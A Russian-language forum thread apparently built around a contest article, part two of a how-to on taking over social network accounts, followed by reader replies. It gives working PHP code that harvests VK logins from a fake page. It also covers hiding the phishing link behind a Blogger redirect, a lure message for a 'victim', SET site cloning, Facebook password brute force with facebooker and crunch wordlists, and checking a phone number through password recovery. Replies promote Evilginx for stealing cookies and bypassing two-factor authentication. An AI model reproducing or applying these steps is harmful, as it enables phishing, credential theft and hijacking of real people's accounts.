• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Конкурс Получение доступа к аккаунту социальной сети. Ч 2

al04e

al04e

Cyberpunk
Премиум
24.05.2017
293
1 294
Статья для участия в конкурсе на codeby.

Приветствую вас дорогие друзья!
Сегодня мы продолжим изучать такую тему как "Получение доступа к аккаунту социальной сети". В прошлой части мы остановились на создании фишинга.

В этой части мы закончим создание нашего фишинг - сайта и приступим к разбору остальных тем которые более интересны.

Что же, а теперь создайте файл logs.php с таким содержимым:
PHP:
<?php
     $login = $_POST['email'];
     $pass = $_POST['pass'];
     $file = fopen("my_pass.txt", 'at');
     fwrite($file,"Login --> $login\nPass --> $pass\n-----\n");
     fclose($file);
     echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></head></html>";
?>
Файл test_fish.html , после того как пользователь введет данные, отправит их в logs.php
Этот файл запишет данные в файл my_pass.txt и перенаправит пользователя обратно на сайт вконтакте. Чтобы создать такой скрипт обратите внимание на атрибут method, а вернее на его значение. В моем случае данные переданы методом post. Также обратите на значение атрибута name. У вконтакте это email и pass. То есть если вы увидите примерно такой код
HTML:
<form method = 'GET' action = 'http://mysite/login.php'>
<label> Login:</label>
<input type = "text" name = "login" />
<label> Password:</label>
<input type = "password" name = "passwd" />
<input type = "button" />
</form>
То начало нашего скрипта logs.php выглядело бы так

PHP:
<?php
    $login = $_GET['login'];
    $pass = $_GET['passwd'];

.....

Наконец мы дошли до финальной части создания фишинга. Осталось закинуть все созданные файлы на хостинг.
В этом вам может помочь программа FileZilla(это на случай если вы любите простые вещи). Название сайта лучше создавать не похожее на название социальной сети. Часто из-за этого некоторые хостинги блокируют ваш фишинг. В итоге мы получаем вот это

Screenshot from 2017-11-02 13-53-50.png

И после ввода некоторых данных убеждаюсь в стабильной работоспособности фишинга

Получение доступа к аккаунту социальной сети. Ч 2


Практически всегда, если отправить пользователю чисто ссылку на фишинг то социальная сеть заблокирует ссылку. Есть много способов для обхода блокировки, но я для примера опишу вам лишь один.

1. Регистрируем аккаунт в blogger.com(не реклама) --> создаем свой блог.

2. Переходим к пункту Шаблон --> Изменить html.

3. Сократите ссылку на ваш фишинг. Далее добавим следующий код перед тегом <head>
HTML:
<meta content='0; url=сокращенная_ссылка' http-equiv='Refresh'/>
Теперь осталось сохранить.

В конце концов применим социальную инженерию. Здесь как раз таки понадобится информация которую мы собрали ранее. Напишем все той же "жертве" из примера что-то такое:
Привет!
Недавно открыли фанфик. Там Сверхестественное выходит с крутой озвучкой
Держи <ССЫЛКА>
Setoolkit - фреймворк предназначенный для тестирования на проникновение и основанный на социальной инженерии.

На видео я выбрал следующие пункты
Код:
set> 1
set> 2
set:webattak> 3
set:webattak> 2

#Далее вводим имя вашего хоста
#И url сайта который будем клонировать
Остается только сократить ссылку на получившийся фишинг, дать ее "жертве" и мониторить то что выведет set.

Brute Force

Очень сильно уязвим к подбору пароля - facebook. Я создал аккаунт в facebook и оставил много информации. Сегодня мы опираясь на эту информацию попробуем составить базу паролей и применим один старый скрипт для проведения brute force.

Вот внешний вид профиля

Screenshot from 2017-11-02 14-06-14.png

Как я говорил ранее, будем записывать полученную информацию. Первое что бросается в глаза - это имя и фамилия. Смотрим далее и видим этот пост, сразу предполагая род деятельности

Получение доступа к аккаунту социальной сети. Ч 2


Просмотрев далее я нашел номер телефона пользователя. Проверив его на принадлежность к аккаунту начинаю брутить. Для этого понадобится скрипт facebooker

Распаковываем и далее пишем
Код:
chmod +x facebooker.pl
./facebooker <login> <wordlist>
Screenshot from 2017-11-02 14-14-07.png

Как видим на скрине, спустя некоторое время мы нашли пароль в простенькой базе.

После того как вы собрали информацию и поискав в топ базах не нашли пароля. То можно создать свою базу основываясь на собранной информации. Также в этом вам может помочь crunch. Создание своей базы может отнять уйму времени.

К примеру я создаю базу на пользователя имя которого Саня. Еще я предполагаю что Саня не такой умный и его пароль состоит из его имени и набора цифр. Тогда я получаю следующую команду
Код:
crunch 10 10 -t sanya.%%%% >> baza.txt
Эти 4 цифры могут быть какой-то определенной датой, как раз таки пройдемся по ним.
Повторяюсь, на создание своей базы можно убить очень много времени.

Помните в прошлой части я писал что при общении с "жертвой" мне удалось выудить много информации в числе которой был номер телефона?

Так вот давайте узнаем является ли этот номер логином данной страницы или нет.

Для примера снова вернусь к вконтакте. Переходим по "Забыли пароль"(мобильной версии). Пишем номер который удалось узнать и фамилию пользователя. Если пользователь с такими данными имеется, то ясно дело что номер который мы вводили ранее привязан к данной странице.

Получение доступа к аккаунту социальной сети. Ч 2


Значит что тот номер который я выудил привязан к странице данного пользователя.
А если не получилось, то постарайтесь узнать нет ли у данного пользователя фейка.
В следующей части закончим тему изучения этого способа.
А на этом часть 2 подошла к концу. До встречи в следующей части.
 

Вложения

7

78tyn8!gert

Member
02.11.2017
13
13
Для фишинга есть хороший инструмент - Evilginx

1. не надо возиться с созданием фэйка
2. ворует пароли + куки
3. Обходит двухэтапную аутентификацию

Нужен домен + хостинг.
Во время атаки хотя и используется фишинговый домен, показывается реальная страница входа на сервис. Работает как прокси.

 
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Для фишинга есть хороший инструмент - Evilginx

1. не надо возиться с созданием фэйка
2. ворует пароли + куки
3. Обходит двухэтапную аутентификацию

Нужен домен + хостинг.
Во время атаки хотя и используется фишинговый домен, показывается реальная страница входа на сервис. Работает как прокси.

***Скрытый текст***
3. Обходит двухэтапную аутентификацию

Как так то ?)
 
Artem.ser

Artem.ser

Active member
04.11.2017
35
6
3. Обходит двухэтапную аутентификацию

Как так то ?)
78tyn8!gert написал, что оно работает как прокси.
Мое предположение: Мы перехватываем лог/пароль, скрипт пытается войти на страницу, если там есть 2-ой фактор запрашиваем у жертвы посредством 2-ой фишинговой страницы код, который придет на ее телефон. Вводит код, считываем и попадаем в аккаунт. Жертву просто перенаправляем на уже офф сайт того ресурса, который клонировали.
 
A

Anque

интересует развитие событий после получения доступов в соц. профайлу.
вполне вероятно, что понадобиться авторизироваться, но.. в таком случае настоящему владельцу аккаунта приходит смс-оповещение о случившемся, что вызывает вопросы :[
 
  • Нравится
Реакции: N1GHT_H3R0
Artem.ser

Artem.ser

Active member
04.11.2017
35
6
интересует развитие событий после получения доступов в соц. профайлу.
вполне вероятно, что понадобиться авторизироваться, но.. в таком случае настоящему владельцу аккаунта приходит смс-оповещение о случившемся, что вызывает вопросы :[
Я ж сообщением выше отписал как это обойти
у жертвы создается иллюзия того, что он вошел в аккаунт, но не до конца и поэтому смс не вызывает никаких подозрений в большинстве случаев
 
A

Anque

Я ж сообщением выше отписал как это обойти
у жертвы создается иллюзия того, что он вошел в аккаунт, но не до конца и поэтому смс не вызывает никаких подозрений в большинстве случаев
каким образом запросить у жертвы код, после того как она посетила наш фишинговый сайт?)
 
Artem.ser

Artem.ser

Active member
04.11.2017
35
6
каким образом запросить у жертвы код, после того как она посетила наш фишинговый сайт?)
Ну мы же уже внутри будем
никто не мешает просто добавить доверяемое устройство
ну там скользко довольно
все от ситуации и веб платформы зависит
 
A

Anque

Ну мы же уже внутри будем
никто не мешает просто добавить доверяемое устройство
ну там скользко довольно
все от ситуации и веб платформы зависит
я, определенно, чего-то не допонял.
когда мы будем внутри(в профайле на оригинальном вк), ей уже придет оповещение.
все приготовления должны быть сделаны заранее
 
7

78tyn8!gert

Member
02.11.2017
13
13
я, определенно, чего-то не допонял.
когда мы будем внутри(в профайле на оригинальном вк), ей уже придет оповещение.
все приготовления должны быть сделаны заранее
Лучше один раз увидеть))

 
woolf1514

woolf1514

Well-known member
06.03.2017
162
169
Этим способом фишинговая страница получилась не особо правдоподобная. Высока вероятность того, что жертва что-то заподозрит. Так же, пользователь может просто ввести неправильные данные и они в твоем случае никак не проверяются, если я все правильно понимаю. Мне периодически приходят такие ссылки, на которых для начала можно ввести логин huisosi и пароль guboitryasi и потом уже начинать dbrute =)
Думаю, проще взять готовое решение с проверкой валидности, коих на томже ютубе лежит валом и их уже заливать на хостинг.
Когда сам задавался подобным вопросом, то создавал блог в сервисе гугл, на нем настраивал редирект на свой фишинг. Это не выглядит подозрительно (у сокращателей ссылок не самая лучшая репутация), да еще и vk сам в сообщении подтянет красивую картинку под ссылку, которую ты отправишь жертве (картинку в блоге вставляешь сам по своему усмотрению). Так же, предусматривал автопереключение на мобильную версию сайта, чтоб повысить вероятность профита. Большинство пользователей сидят с мобильного.
 
Artem.ser

Artem.ser

Active member
04.11.2017
35
6
Да, го статейку по Evilginx, кто в нем уже разобрался
Вроде функционал шикарен
 
  • Нравится
Реакции: <~DarkNode~>
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 990
Да, го статейку по Evilginx, кто в нем уже разобрался
Вроде функционал шикарен
Давай тож включайся)) уверен у тебя так же есть стопочка годного материала)
Для чего активничать ?
Все просто - что бы тебя увидели и позвали в тим с закрытым разделом)
Пока форум молодой - у истоков всегда проще двигаться вверх)
 
  • Нравится
Реакции: Artem.ser и 78tyn8!gert
A

Anque

яро(!) плюсую в поддержку написания какого-нибудь справочника/мана/ликбеза по evilginx'y или, мне было бы полезно, общим поверхностным моментам, которые могут дать толчки в этом направлении.
всегда была интересна кибербезопасность и её другая сторона :]
 
  • Нравится
Реакции: al04e
al04e

al04e

Cyberpunk
Премиум
24.05.2017
293
1 294
яро(!) плюсую в поддержку написания какого-нибудь справочника/мана/ликбеза по evilginx'y или, мне было бы полезно, общим поверхностным моментам, которые могут дать толчки в этом направлении.
всегда была интересна кибербезопасность и её другая сторона :]
Как приятно знать , что на кодеби много пользователей желают внести свой вклад в развитие форума)
 
  • Нравится
Реакции: Artem.ser
Artem.ser

Artem.ser

Active member
04.11.2017
35
6
Давай тож включайся)) уверен у тебя так же есть стопочка годного материала)
Для чего активничать ?
Все просто - что бы тебя увидели и позвали в тим с закрытым разделом)
Пока форум молодой - у истоков всегда проще двигаться вверх)
Хм, подумаю над статейкой
Но пока (как я думаю) у меня слишком мало знаний именно практических, только теория
Может как-то позже, но от командной работы не откажусь, как никак будет наконец адекватная практика
 
al04e

al04e

Cyberpunk
Премиум
24.05.2017
293
1 294
Хм, подумаю над статейкой
Но пока (как я думаю) у меня слишком мало знаний именно практических, только теория

как никак будет наконец адекватная практика
Без практики теория мертва, без теории практика слепа.
Слышал когда-нибудь?
 
  • Нравится
Реакции: Dr.Lafa
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб